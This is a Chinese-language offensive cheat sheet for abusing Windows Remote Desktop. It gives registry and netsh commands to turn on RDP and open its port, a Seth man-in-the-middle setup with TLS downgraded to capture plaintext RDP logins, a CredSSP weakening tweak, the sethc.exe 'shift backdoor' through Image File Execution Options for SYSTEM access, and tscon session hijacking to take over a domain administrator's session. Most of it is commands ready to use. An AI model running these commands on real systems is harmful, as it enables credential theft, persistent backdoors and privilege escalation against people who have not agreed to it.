rdp服务确认启动
通过注册表查询
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服务的端口
hex的0xd3d等于10进制的3389
通过进程查看
tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "1820" # 找到进程对应的端口号
启动rdp
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f # 监听 3389 端口
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow #允许3389通过防火墙
中间人攻击
git clone --depth=1 https://hub.fastgit.org/SySS-Research/Seth.git
cd seth
修改/etc/ssl/openssl.cnf
[system_default_sect]
#MinProtocol = TLSv1.2
#CipherString = DEFAULT@SECLEVEL=2
MinProtocol = None
CipherString = DEFAULT
./seth.sh eth0 192.168.164.128 192.168.164.131 192.168.164.129 # 在192.168.164.128机器上,劫持由192.168.164.131向192.168.164.129的RDP申请,获得登录明文
在本地测试时,链接win10主机可以,链接win2008r2报错
TLS alert internal error received, make sure to use RC4-SHA
有关问题
https://github.com/SySS-Research/Seth/issues/17
暂无解决方案
登录
在登录前,首先要查看是否有用户在线,
Windows Server 2003 支持统一用户登陆多地登陆互不影响,使用query user查看在线用户,XP没有该命令也可以使用taskmgr从任务管理器查看,同一权限下可以相互注销会话。
非服务器版本的Windows 系统默认只允许一个账户登录。当远程用户登录时使用与原系统相同的账户,原系统将切换到登陆页面,并会看到登陆的机器名
如果使用不同的账户,原系统将弹窗提示其他用户已登陆到此计算机
如果出现远程连接出现身份验证错误,要求的函数不支持
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
shift后门结合rdp劫持
去掉”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项,利用shift后门可以快速获得system权限
shift后门
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
query user #查看用户ip
tscon id
利用点
切换域用户身份,域内提权。如:域管账号登录在当前机器,抓密码的方式均被拦截可以考虑该方式
多用户登录
手动设置
将计算机配置(Computer Configuration)->管理模板(Administrative Templates)->Windows组件(Windows Components)->远程桌面服务(Remote Desktop Services)->远程桌面会话主机(Remote Desktop Session Host)->链接(Connections),禁用”将远程桌面服务的用户限制到单独的远程桌面会话”(Restrict Remote Desktop Services users to a single Remote Desktop Services session)
rdpwrap
https://github.com/stascorp/rdpwrap
参考文章
LM-RDP
https://www.freebuf.com/sectool/170024.html